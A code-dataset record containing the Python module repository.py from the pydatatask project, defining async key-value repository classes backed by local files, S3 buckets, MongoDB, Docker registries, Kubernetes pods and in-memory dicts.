self.__add_report_path(subparsers)\n","repo_name":"OSLL/code-plagiarism","sub_path":"src/codeplag/codeplagcli.py","file_name":"codeplagcli.py","file_ext":"py","file_size_in_byte":9281,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"}
+{"seq_id":"11040107019","text":"\"\"\"\nRepositories are arbitrary key-value stores. They are the data part of pydatatask.\nYou can store your data in any way you desire and as long as you can write a Repository class to describe it, it can be\nused to drive a pipeline.\n\nThe notion of the \"value\" part of the key-value store abstraction is defined very, very loosely. The repository base\nclass doesn't have an interface to get or store values, only to query for and delete keys. Instead, you have to know\nwhich repository subclass you're working with, and use its interfaces. For example, `MetadataRepository` assumes that\nits values are structured objects and loads them fully into memory, and `BlobRepository` provides a streaming interface\nto a flat address space.\n\"\"\"\nfrom typing import (\n TYPE_CHECKING,\n Any,\n AsyncGenerator,\n AsyncIterable,\n Awaitable,\n Callable,\n Coroutine,\n Dict,\n List,\n Literal,\n Optional,\n overload,\n)\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom pathlib import Path\nimport base64\nimport hashlib\nimport inspect\nimport io\nimport logging\nimport os\nimport string\n\nfrom kubernetes_asyncio.client import V1Pod\nfrom types_aiobotocore_s3.client import S3Client\nimport aiofiles.os\nimport aiohttp.client_exceptions\nimport aioshutil\nimport botocore.exceptions\nimport docker_registry_client_async\nimport dxf\nimport motor.motor_asyncio\nimport yaml\n\nfrom .utils import AReadStream, AReadText, AWriteStream, AWriteText, roundrobin\n\nif TYPE_CHECKING:\n from .task import ExecutorTask, KubeTask\n\nl = logging.getLogger(__name__)\n\n__all__ = (\n \"Repository\",\n \"BlobRepository\",\n \"MetadataRepository\",\n \"FileRepositoryBase\",\n \"FileRepository\",\n \"DirectoryRepository\",\n \"S3BucketRepository\",\n \"S3BucketInfo\",\n \"MongoMetadataRepository\",\n \"InProcessMetadataRepository\",\n \"InProcessBlobStream\",\n \"InProcessBlobRepository\",\n \"DockerRepository\",\n \"LiveKubeRepository\",\n \"ExecutorLiveRepo\",\n \"AggregateOrRepository\",\n \"AggregateAndRepository\",\n \"BlockingRepository\",\n \"YamlMetadataRepository\",\n \"YamlMetadataFileRepository\",\n \"YamlMetadataS3Repository\",\n \"RelatedItemRepository\",\n)\n\n\ndef job_getter(f):\n \"\"\"\n Use this function to annotate non-abstract methods which take a job identifier as their first parameter. This is\n used by RelatedItemRepository to automatically translate job identifiers to related ones.\n \"\"\"\n if not inspect.iscoroutinefunction(f):\n raise TypeError(\"only async functions can be job_getters\")\n f.is_job_getter = True\n return f\n\n\nclass Repository(ABC):\n \"\"\"\n A repository is a key-value store where the keys are names of jobs. Since the values have unspecified semantics, the\n only operations you can do on a generic repository are query for keys.\n\n A repository can be async-iterated to get a listing of its members.\n \"\"\"\n\n CHARSET = CHARSET_START_END = string.ascii_letters + string.digits\n\n @classmethod\n def is_valid_job_id(cls, job: str):\n \"\"\"\n Determine whether the given job identifier is valid, i.e. that it contains only valid characters\n (numbers and letters by default).\n \"\"\"\n return (\n 0 < len(job) < 64\n and all(c in cls.CHARSET for c in job)\n and job[0] in cls.CHARSET_START_END\n and job[-1] in cls.CHARSET_START_END\n )\n\n async def filter_jobs(self, iterator: AsyncIterable[str]) -> AsyncIterable[str]:\n \"\"\"\n Apply `is_valid_job_id` as a filter to an async iterator.\n \"\"\"\n async for job in iterator:\n if self.is_valid_job_id(job):\n yield job\n else:\n l.warning(\"Skipping %s %s - not a valid job id\", self, repr(job))\n\n async def contains(self, item):\n \"\"\"\n Determine whether the given job identifier is present in this repository.\n\n The default implementation is quite inefficient; please override this if possible.\n \"\"\"\n async for x in self:\n if x == item:\n return True\n return False\n\n def __aiter__(self):\n return self.filter_jobs(self.unfiltered_iter())\n\n @abstractmethod\n async def unfiltered_iter(self) -> AsyncGenerator[str, None]:\n \"\"\"\n The core method of Repository. Implement this to produce an iterable of every string which could potentially\n be a job identifier present in this repository. When the repository is iterated directly, this will be filtered\n by `filter_jobs`.\n \"\"\"\n raise NotImplementedError\n # noinspection PyUnreachableCode\n yield None # pylint: disable=unreachable\n\n @abstractmethod\n async def info(self, job) -> Any:\n \"\"\"\n Returns an arbitrary piece of data related to job. Notably, this is used during templating.\n This should do something meaningful even if the repository does not contain the requested job.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def delete(self, job):\n \"\"\"\n Delete the given job from the repository. This should succeed even if the job is not present in this repository.\n \"\"\"\n raise NotImplementedError\n\n async def info_all(self) -> Dict[str, Any]:\n \"\"\"\n Produce a mapping from every job present in the repository to its corresponding info. The default implementation\n is somewhat inefficient; please override it if there is a more effective way to load all info.\n \"\"\"\n return {job: await self.info(job) async for job in self}\n\n async def validate(self):\n \"\"\"\n Override this method to raise an exception if for any reason the repository is misconfigured. This will be\n automatically called by the pipeline on opening.\n \"\"\"\n\n def map(\n self, func: Callable, filt: Optional[Callable[[str], Awaitable[bool]]] = None, allow_deletes=False\n ) -> \"MapRepository\":\n \"\"\"\n Generate a :class:`MapRepository` based on this repository and the given parameters.\n \"\"\"\n return MapRepository(self, func, filt, allow_deletes=allow_deletes)\n\n\nclass MapRepository(Repository):\n \"\"\"\n A MapRepository is a repository which uses arbitrary functions to map and filter results from a base repository.\n \"\"\"\n\n def __init__(\n self,\n base: Repository,\n func: Callable[[Any], Coroutine[None, None, Any]],\n filt: Optional[Callable[[str], Awaitable[bool]]] = None,\n allow_deletes=False,\n ):\n \"\"\"\n :param func: The function to use to translate the base repository's `info` results into the mapped `info`\n results.\n :param filt: Optional: An async function to use to determine whether a given key should be considered part of\n the mapped repository.\n :param allow_deletes: Whether the delete operation will do anything on the mapped repository.\n \"\"\"\n self.base = base\n self.func = func\n self.filter = filt\n self.allow_deletes = allow_deletes\n\n async def contains(self, item):\n if self.filter is None or await self.filter(item):\n return await self.base.contains(item)\n return False\n\n async def delete(self, job):\n if self.allow_deletes:\n await self.base.delete(job)\n\n async def unfiltered_iter(self):\n async for item in self.base.unfiltered_iter():\n if self.filter is None or await self.filter(item):\n yield item\n\n async def info(self, job):\n return await self.func(await self.base.info(job))\n\n async def info_all(self) -> Dict[str, Any]:\n result = await self.base.info_all()\n to_remove = []\n for k, v in result.items():\n if self.filter is None or await self.filter(k):\n result[k] = await self.func(v)\n else:\n to_remove.append(k)\n for k in to_remove:\n result.pop(k)\n return result\n\n\nclass MetadataRepository(Repository, ABC):\n \"\"\"\n A metadata repository has values which are small, structured data, and loads them entirely into memory, returning\n the structured data from the `info` method.\n \"\"\"\n\n @abstractmethod\n async def info(self, job):\n \"\"\"\n Retrieve the data with key ``job`` from the repository.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def dump(self, job, data):\n \"\"\"\n Insert ``data`` into the repository with key ``job``.\n \"\"\"\n raise NotImplementedError\n\n\nclass BlobRepository(Repository, ABC):\n \"\"\"\n A blob repository has values which are flat data blobs that can be streamed for reading or writing.\n \"\"\"\n\n @overload\n async def open(self, job: str, mode: Literal[\"r\"]) -> AReadText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"rb\"]) -> AReadStream:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"w\"]) -> AWriteText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"wb\"]) -> AWriteStream:\n ...\n\n @abstractmethod\n async def open(self, job, mode=\"r\"):\n \"\"\"\n Open the given job's value as a stream for reading or writing, in text or binary mode.\n \"\"\"\n raise NotImplementedError\n\n\nclass FileRepositoryBase(Repository, ABC):\n \"\"\"\n A file repository is a local directory where each job identifier is a filename, optionally suffixed with an\n extension before hitting the filesystem. This is an abstract base class for other file repositories which have more\n to say about what is found at these filepaths.\n \"\"\"\n\n def __init__(self, basedir, extension=\"\", case_insensitive=False):\n self.basedir = Path(basedir)\n self.extension = extension\n self.case_insensitive = case_insensitive\n\n async def contains(self, item):\n return await aiofiles.os.path.exists(self.basedir / (item + self.extension))\n\n def __repr__(self):\n return f'<{type(self).__name__} {self.basedir / (\"*\" + self.extension)}>'\n\n async def unfiltered_iter(self):\n for name in await aiofiles.os.listdir(self.basedir):\n if self.case_insensitive:\n cond = name.lower().endswith(self.extension.lower())\n else:\n cond = name.endswith(self.extension)\n if cond:\n yield name[: -len(self.extension) if self.extension else None]\n\n async def validate(self):\n self.basedir.mkdir(exist_ok=True, parents=True)\n if not os.access(self.basedir, os.W_OK):\n raise PermissionError(f\"Cannot write to {self.basedir}\")\n\n def fullpath(self, job) -> Path:\n \"\"\"\n Construct the full local path of the file corresponding to ``job``.\n \"\"\"\n return self.basedir / (job + self.extension)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The templating info provided by a file repository is the full path to the corresponding file as a string.\n \"\"\"\n return str(self.fullpath(job))\n\n\nclass FileRepository(FileRepositoryBase, BlobRepository):\n \"\"\"\n A file repository whose members are files, treated as streamable blobs.\n \"\"\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n return aiofiles.open(self.fullpath(job), mode)\n\n async def delete(self, job):\n try:\n await aiofiles.os.unlink(self.fullpath(job))\n except FileNotFoundError:\n pass\n\n\nclass DirectoryRepository(FileRepositoryBase):\n \"\"\"\n A file repository whose members are directories.\n \"\"\"\n\n def __init__(self, *args, discard_empty=False, **kwargs):\n \"\"\"\n :param discard_empty: Whether only directories containing at least one member should be considered as \"present\"\n in the repository.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.discard_empty = discard_empty\n\n @job_getter\n async def mkdir(self, job):\n \"\"\"\n Create an empty directory corresponding to ``job``. Do nothing if the directory already exists.\n \"\"\"\n try:\n await aiofiles.os.mkdir(self.fullpath(job))\n except FileExistsError:\n pass\n\n async def delete(self, job):\n if await self.contains(job):\n await aioshutil.rmtree(self.fullpath(job))\n\n async def contains(self, item):\n result = await super().contains(item)\n if not self.discard_empty:\n return result\n if not result:\n return False\n return bool(list(await aiofiles.os.listdir(self.fullpath(item))))\n\n async def unfiltered_iter(self):\n async for item in super().unfiltered_iter():\n if self.discard_empty:\n if bool(list(await aiofiles.os.listdir(self.fullpath(item)))):\n yield item\n else:\n yield item\n\n\nclass S3BucketBinaryWriter:\n \"\"\"\n A class for streaming (or buffering) byte data to be written to an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, repo: \"S3BucketRepository\", job: str):\n self.repo = repo\n self.job = job\n self.buffer = io.BytesIO()\n super().__init__()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n async def close(self):\n \"\"\"\n Close and flush the data to the bucket.\n \"\"\"\n self.buffer.seek(0, io.SEEK_END)\n size = self.buffer.tell()\n self.buffer.seek(0, io.SEEK_SET)\n await self.repo.client.put_object(\n Bucket=self.repo.bucket,\n Key=self.repo.object_name(self.job),\n Body=self.buffer,\n ContentLength=size,\n ContentType=self.repo.mimetype,\n )\n\n async def write(self, data: bytes):\n \"\"\"\n Write some data to the stream.\n \"\"\"\n self.buffer.write(data)\n\n\nclass S3BucketReader:\n \"\"\"\n A class for streaming byte data from an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, body):\n self.body = body\n\n async def close(self):\n \"\"\"\n Close and release the stream.\n \"\"\"\n self.body.close()\n\n async def read(self, n=None): # pylint: disable=unused-argument :(\n \"\"\"\n Read the entire body of the blob. Due to API limitations, we can't read less than that at once...\n \"\"\"\n return await self.body.read()\n\n async def __aenter__(self):\n await self.body.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.body.__aexit__(exc_type, exc_val, exc_tb)\n\n\nclass S3BucketInfo:\n \"\"\"\n The data structure returned from :meth:`S3BucketRepository.info`.\n\n :ivar uri: The s3 URI of the current job's resource, e.g. ``s3://bucket/prefix/job.ext``. ``str(info)`` will also\n return this.\n :ivar endpoint: The URL of the API server providing the S3 interface.\n :ivar bucket: The name of the bucket objects are stored in.\n :ivar prefix: How to prefix an object name such that it will fit into this repository.\n :ivar suffix: How to suffix an object name such that it will fit into this repository.\n \"\"\"\n\n def __init__(self, endpoint: str, uri: str, bucket: str, prefix: str, suffix: str):\n self.endpoint = endpoint\n self.uri = uri\n self.prefix = prefix\n self.suffix = suffix\n self.bucket = bucket\n\n def __str__(self):\n return self.uri\n\n\nclass S3BucketRepository(BlobRepository):\n \"\"\"\n A repository where keys are paths in a S3 bucket. Provides a streaming interface to the corresponding blobs.\n \"\"\"\n\n def __init__(\n self,\n client: Callable[[], S3Client],\n bucket: str,\n prefix: str = \"\",\n suffix: str = \"\",\n mimetype: str = \"application/octet-stream\",\n incluster_endpoint: Optional[str] = None,\n ):\n \"\"\"\n :param client: A callable returning an aiobotocore S3 client connected and authenticated to the server you wish\n to store things on.\n :param bucket: The name of the bucket from which to load and store.\n :param prefix: A prefix to put on the job name before translating it into a bucket path. If this is meant to be\n a directory name it should end with a slash character.\n :param suffix: A suffix to put on the job name before translating it into a bucket path. If this is meant to\n be a file extension it should start with a dot.\n :param mimetype: The MIME type to set the content when adding data.\n :param incluster_endpoint: Optional: An endpoint URL to provide as the result of info() queries instead of\n extracting the URL from ``client``.\n \"\"\"\n self._client = client\n self.bucket = bucket\n self.prefix = prefix\n self.suffix = suffix\n self.mimetype = mimetype\n self.incluster_endpoint = incluster_endpoint\n\n @property\n def client(self):\n \"\"\"\n The aiobotocore S3 client. This will raise an error if the client comes from a session which is not opened.\n \"\"\"\n return self._client()\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.bucket}/{self.prefix}*{self.suffix}>\"\n\n async def contains(self, item):\n try:\n await self.client.head_object(Bucket=self.bucket, Key=self.object_name(item))\n except botocore.exceptions.ClientError:\n return False\n else:\n return True\n\n async def unfiltered_iter(self):\n paginator = self.client.get_paginator(\"list_objects\")\n async for page in paginator.paginate(Bucket=self.bucket, Prefix=self.prefix):\n for obj in page.get(\"Contents\", []):\n if obj[\"Key\"].endswith(self.suffix):\n yield obj[\"Key\"][len(self.prefix) : -len(self.suffix) if self.suffix else None]\n\n async def validate(self):\n try:\n await self.client.head_bucket(Bucket=self.bucket)\n except botocore.exceptions.ClientError as e:\n if \"404\" in str(e):\n await self.client.create_bucket(Bucket=self.bucket)\n else:\n raise\n\n def object_name(self, job):\n \"\"\"\n Return the object name for the given job.\n \"\"\"\n return f\"{self.prefix}{job}{self.suffix}\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n if mode == \"wb\":\n return S3BucketBinaryWriter(self, job)\n elif mode == \"w\":\n return AWriteText(S3BucketBinaryWriter(self, job))\n elif mode == \"rb\":\n return S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n elif mode == \"r\":\n return AReadText(\n S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n )\n else:\n raise ValueError(mode)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Return an `S3BucketInfo` corresponding to the given job.\n \"\"\"\n return S3BucketInfo(\n self.incluster_endpoint or self.client._endpoint.host,\n f\"s3://{self.bucket}/{self.object_name(job)}\",\n self.bucket,\n self.prefix,\n self.suffix,\n )\n\n async def delete(self, job):\n await self.client.delete_object(Bucket=self.bucket, Key=self.object_name(job))\n\n\nclass MongoMetadataRepository(MetadataRepository):\n \"\"\"\n A metadata repository using a MongoDB collection as the backing store.\n \"\"\"\n\n def __init__(\n self,\n collection: Callable[[], motor.motor_asyncio.AsyncIOMotorCollection],\n subcollection: Optional[str],\n ):\n \"\"\"\n :param collection: A callable returning a motor async collection.\n :param subcollection: Optional: the name of a subcollection within the collection in which to store data.\n \"\"\"\n self._collection = collection\n self._subcollection = subcollection\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self._subcollection}>\"\n\n @property\n def collection(self) -> motor.motor_asyncio.AsyncIOMotorCollection:\n \"\"\"\n The motor async collection data will be stored in. If this is provided by an unopened session, raise an error.\n \"\"\"\n result = self._collection()\n if self._subcollection is not None:\n result = result[self._subcollection]\n return result\n\n async def contains(self, item):\n return await self.collection.count_documents({\"_id\": item}) != 0\n\n async def delete(self, job):\n await self.collection.delete_one({\"_id\": job})\n\n async def unfiltered_iter(self):\n async for x in self.collection.find({}, projection=[]):\n yield x[\"_id\"]\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info of a mongo metadata repository is the literal value stored in the repository with identifier ``job``.\n \"\"\"\n result = await self.collection.find_one({\"_id\": job})\n if result is None:\n result = {}\n return result\n\n async def info_all(self) -> Dict[str, Any]:\n return {entry[\"_id\"]: entry async for entry in self.collection.find({})}\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n await self.collection.replace_one({\"_id\": job}, data, upsert=True)\n\n\nclass DockerRepository(Repository):\n \"\"\"\n A docker repository is, well, an actual docker repository hosted in some registry somewhere. Keys translate to tags\n on this repository.\n \"\"\"\n\n def __init__(\n self,\n registry: Callable[[], docker_registry_client_async.DockerRegistryClientAsync],\n domain: str,\n repository: str,\n ):\n \"\"\"\n :param registry: A callable returning a\n `docker_registry_client_async `_\n client object with appropriate authentication information.\n :param domain: The registry domain to connect to, e.g. ``index.docker.io``.\n :param repository: The repository to store images in within the domain, e.g. ``myname/myrepo``.\n \"\"\"\n self._registry = registry\n self.domain = domain\n self.repository = repository\n\n @property\n def registry(self) -> docker_registry_client_async.DockerRegistryClientAsync:\n \"\"\"\n The ``docker_registry_client_async`` client object. If this is provided by an unopened session, raise an error.\n \"\"\"\n return self._registry()\n\n async def unfiltered_iter(self):\n try:\n image = docker_registry_client_async.ImageName(self.repository, endpoint=self.domain)\n tags = (await self.registry.get_tags(image)).tags[\"tags\"]\n if tags is None:\n return\n for tag in tags:\n yield tag\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.status != 404:\n raise\n\n def __repr__(self):\n return f\"\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by a docker repository is a dict with two keys, \"withdomain\" and \"withoutdomain\". e.g.:\n\n .. code::\n\n { \"withdomain\": \"docker.example.com/myname/myrepo:job\", \"withoutdomain\": \"myname/myrepo:job\" }\n \"\"\"\n return {\n \"withdomain\": f\"{self.domain}/{self.repository}:{job}\",\n \"withoutdomain\": f\"{self.repository}:{job}\",\n }\n\n def _dxf_auth(self, dxf_obj, response):\n # what a fucking hack\n for pattern, credentials in self.registry.credentials.items():\n if pattern.fullmatch(self.domain):\n result = credentials\n break\n else:\n raise PermissionError(\"Missing credentials for %s\" % self.domain)\n if self.registry.ssl:\n username, password = base64.b64decode(result).decode().split(\":\")\n dxf_obj.authenticate(username, password, response)\n else:\n dxf_obj._headers = {\"Authorization\": \"Basic \" + result}\n\n async def delete(self, job):\n # if not await self.contains(job):\n # return\n\n self._delete_inner(job) # blocking! epic fail\n\n def _delete_inner(self, job):\n random_data = os.urandom(16)\n random_digest = \"sha256:\" + hashlib.sha256(random_data).hexdigest()\n\n d = dxf.DXF(\n host=self.domain,\n repo=self.repository,\n auth=self._dxf_auth,\n insecure=not self.registry.ssl,\n )\n d.push_blob(data=random_data, digest=random_digest)\n d.set_alias(job, random_digest)\n d.del_alias(job)\n\n\nclass LiveKubeRepository(Repository):\n \"\"\"\n A repository where keys translate to ``job`` labels on running kube pods. This repository is constructed\n automatically by a `KubeTask` or subclass and is linked as the ``live`` repository. Do not construct this class\n manually.\n \"\"\"\n\n def __init__(self, task: \"KubeTask\"):\n self.task = task\n\n async def unfiltered_iter(self):\n for pod in await self.pods():\n yield pod.metadata.labels[\"job\"]\n\n async def contains(self, item):\n return bool(await self.task.podman.query(task=self.task.name, job=item))\n\n def __repr__(self):\n return f\"\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Cannot template with live kube info. Implement this if you have something in mind.\n \"\"\"\n return None\n\n async def pods(self) -> List[V1Pod]:\n \"\"\"\n A list of live pod objects corresponding to this repository.\n \"\"\"\n return await self.task.podman.query(task=self.task.name)\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from this repository will delete the pod.\n \"\"\"\n pods = await self.task.podman.query(job=job, task=self.task.name)\n for pod in pods: # there... really should be only one\n await self.task.delete(pod)\n # while await self.task.podman.query(job=job, task=self.task.name):\n # await asyncio.sleep(0.2)\n\n\nclass AggregateAndRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if all its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n counting = Counter()\n async for item in roundrobin([child.unfiltered_iter() for child in self.children.values()]):\n counting[item] += 1\n if counting[item] == len(self.children):\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if not await child.contains(item):\n return False\n return True\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate And repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate And repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass AggregateOrRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if any of its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n seen = set()\n for child in self.children.values():\n async for item in child.unfiltered_iter():\n if item in seen:\n continue\n seen.add(item)\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if await child.contains(item):\n return True\n return False\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate Or repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate Or repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass BlockingRepository(Repository):\n \"\"\"\n A class that is said to contain a job if ``source`` contains it and ``unless`` does not contain it\n \"\"\"\n\n def __init__(self, source: Repository, unless: Repository, enumerate_unless=True):\n self.source = source\n self.unless = unless\n self.enumerate_unless = enumerate_unless\n\n async def unfiltered_iter(self):\n if self.enumerate_unless:\n blocked = set()\n async for x in self.unless.unfiltered_iter():\n blocked.add(x)\n else:\n blocked = None\n async for item in self.source.unfiltered_iter():\n if self.enumerate_unless and item in blocked:\n continue\n if not self.enumerate_unless and self.unless.contains(item):\n continue\n yield item\n\n async def contains(self, item):\n return await self.source.contains(item) and not await self.unless.contains(item)\n\n @job_getter\n async def info(self, job):\n return await self.source.info(job)\n\n async def delete(self, job):\n await self.source.delete(job)\n\n\nclass YamlMetadataRepository(BlobRepository, MetadataRepository, ABC):\n \"\"\"\n A metadata repository based on a blob repository. When info is accessed, it will **load the target file into\n memory**, parse it as yaml, and return the resulting object.\n\n This is a base class, and must be overridden to implement the blob loading portion.\n \"\"\"\n\n @job_getter\n async def info(self, job):\n async with await self.open(job, \"rb\") as fp:\n s = await fp.read()\n return yaml.safe_load(s)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n s = yaml.safe_dump(data, None)\n async with await self.open(job, \"w\") as fp:\n await fp.write(s)\n\n\nclass YamlMetadataFileRepository(YamlMetadataRepository, FileRepository):\n \"\"\"\n A metadata repository based on a file blob repository.\n \"\"\"\n\n def __init__(self, filename, extension=\".yaml\", case_insensitive=False):\n super().__init__(filename, extension=extension, case_insensitive=case_insensitive)\n\n\nclass YamlMetadataS3Repository(YamlMetadataRepository, S3BucketRepository):\n \"\"\"\n A metadata repository based on a s3 bucket repository.\n \"\"\"\n\n def __init__(self, client, bucket, prefix, suffix=\".yaml\", mimetype=\"text/yaml\"):\n super().__init__(client, bucket, prefix, suffix=suffix, mimetype=mimetype)\n\n @job_getter\n async def info(self, job):\n try:\n return await super().info(job)\n except botocore.exceptions.ClientError as e:\n if \"NoSuchKey\" in str(e):\n return {}\n else:\n raise\n\n\nclass RelatedItemRepository(Repository):\n \"\"\"\n A repository which returns items from another repository based on following a related-item lookup.\n \"\"\"\n\n def __init__(\n self,\n base_repository: Repository,\n translator_repository: Repository,\n allow_deletes=False,\n prefetch_lookup=True,\n ):\n \"\"\"\n :param base_repository: The repository from which to return results based on translated keys. The resulting\n repository will duck-type as the same type as the base.\n :param translator_repository: A repository whose info() will be used to translate keys:\n ``info(job) == translated_job``.\n :param allow_deletes: Whether the delete operation on this repository does anything. If enabled, it will delete\n only from the base repository.\n :param prefetch_lookup: Whether to cache the entirety of the translator repository in memory to improve\n performance.\n \"\"\"\n self.base_repository = base_repository\n self.translator_repository = translator_repository\n self.allow_deletes = allow_deletes\n self.prefetch_lookup_setting = prefetch_lookup\n self.prefetch_lookup = None\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.base_repository} by {self.translator_repository}>\"\n\n async def _lookup(self, item):\n if self.prefetch_lookup is None and self.prefetch_lookup_setting:\n self.prefetch_lookup = await self.translator_repository.info_all()\n if self.prefetch_lookup:\n return self.prefetch_lookup.get(item)\n else:\n return await self.translator_repository.info(item)\n\n async def contains(self, item):\n basename = await self._lookup(item)\n if basename is None:\n return False\n return await self.base_repository.contains(basename)\n\n async def delete(self, job):\n if not self.allow_deletes:\n return\n\n basename = await self._lookup(job)\n if basename is None:\n return\n\n await self.base_repository.delete(basename)\n\n @job_getter\n async def info(self, job):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n\n return await self.base_repository.info(basename)\n\n def __getattr__(self, item):\n v = getattr(self.base_repository, item)\n if not getattr(v, \"is_job_getter\", False):\n return v\n\n async def inner(job, *args, **kwargs):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n return await v(basename, *args, **kwargs)\n\n return inner\n\n async def unfiltered_iter(self):\n base_contents = {x async for x in self.base_repository}\n async for item in self.translator_repository:\n basename = await self._lookup(item)\n if basename is not None and basename in base_contents:\n yield item\n\n\nclass ExecutorLiveRepo(Repository):\n \"\"\"\n A repository where keys translate to running jobs in an ExecutorTask. This repository is constructed automatically\n and is linked as the ``live`` repository. Do not construct this class manually.\n \"\"\"\n\n def __init__(self, task: \"ExecutorTask\"):\n self.task = task\n\n def __repr__(self):\n return f\"<{type(self).__name__} task={self.task.name}>\"\n\n async def unfiltered_iter(self):\n for job in self.task.rev_jobs:\n yield job\n\n async def contains(self, item):\n return item in self.task.rev_jobs\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from the repository will cancel the corresponding task.\n \"\"\"\n await self.task.cancel(job)\n\n async def info(self, job):\n \"\"\"\n There is no templating info for an `ExecutorLiveRepo`.\n \"\"\"\n return None\n\n\nclass InProcessMetadataRepository(MetadataRepository):\n \"\"\"\n An incredibly simple metadata repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, Any]] = None):\n self.data: Dict[str, Any] = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n return self.data.get(job)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n self.data[job] = data\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del self.data[job]\n\n async def unfiltered_iter(self):\n for job in self.data:\n yield job\n\n\nclass InProcessBlobStream:\n \"\"\"\n A stream returned from an `BlobRepository.open` call from `InProcessBlobRepository`. Do not construct this manually.\n \"\"\"\n\n def __init__(self, repo: \"InProcessBlobRepository\", job: str): # pylint: disable=missing-function-docstring\n self.repo = repo\n self.job = job\n self.data = io.BytesIO(repo.data.get(job, b\"\"))\n\n async def read(self, n: Optional[int] = None) -> bytes:\n \"\"\"\n Read up to ``n`` bytes from the stream.\n \"\"\"\n return self.data.read(n)\n\n async def write(self, data: bytes):\n \"\"\"\n Write ``data`` to the stream.\n \"\"\"\n self.data.write(data)\n\n async def close(self):\n \"\"\"\n Close and release the stream, syncing the data back to the repository.\n \"\"\"\n self.repo.data[self.job] = self.data.getvalue()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n\nclass InProcessBlobRepository(BlobRepository):\n \"\"\"\n An incredibly simple blob repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, bytes]] = None):\n self.data = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n There is no templating info for an `InProcessBlobRepository`.\n \"\"\"\n return None\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n stream = InProcessBlobStream(self, job)\n if mode == \"r\":\n return AReadText(stream)\n elif mode == \"w\":\n return AWriteText(stream)\n else:\n return stream\n\n async def unfiltered_iter(self):\n for item in self.data:\n yield item\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del self.data[job]\n","repo_name":"rhelmot/pydatatask","sub_path":"pydatatask/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":39077,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
